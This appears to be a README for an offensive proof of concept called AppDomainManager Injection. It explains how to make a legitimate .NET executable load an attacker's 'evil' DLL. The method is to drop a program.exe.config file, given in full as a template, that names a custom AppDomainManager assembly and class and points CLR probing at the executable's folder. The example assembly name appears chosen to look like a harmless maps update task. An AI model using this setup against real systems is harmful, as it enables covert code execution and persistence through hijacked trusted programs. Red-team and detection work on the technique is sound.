# AppDomainManager Injection

A Proof of Concept presenting how we can make .NET executable to load our evil .NET DLL serving it our custom `AppDomainManager`.

Idea is to instrument .NET CLR to offer it alternative `AppDomain`s handler, implemented in our code.

To set it up, we need to prepare `program.exe.config` XML file with following contents:

```
<configuration>
   <runtime>
      <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
         <probing privatePath="."/>
      </assemblyBinding>
	  <appDomainManagerAssembly value="DLL_ASSEMBLY_REFERENCE" />  
	  <appDomainManagerType value="APPDOMAIN_CLASS_NAME" />  
   </runtime>
</configuration>

```

Where:

- `APPDOMAIN_CLASS_NAME` is the name of our evil `AppDomain` class implemented in dropped DLL
- `DLL_ASSEMBLY_REFERENCE` is the .NET assembly reference string, similar to this: `mapsupdatetask8, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null`

The `privatePath` property tells CLR to look for this DLL in current (from EXE perspective) path.